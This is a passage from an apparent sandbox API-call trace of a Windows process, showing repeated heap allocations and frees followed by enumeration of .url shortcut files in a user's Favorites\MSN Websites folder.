Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0175.791] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0175.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0175.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.793] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd90 | out: hHeap=0x6a0000) returned 1 [0175.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.820] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0175.820] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0175.820] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.820] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.820] PathFindFileNameW (pszPath="") returned="" [0175.820] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0175.823] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 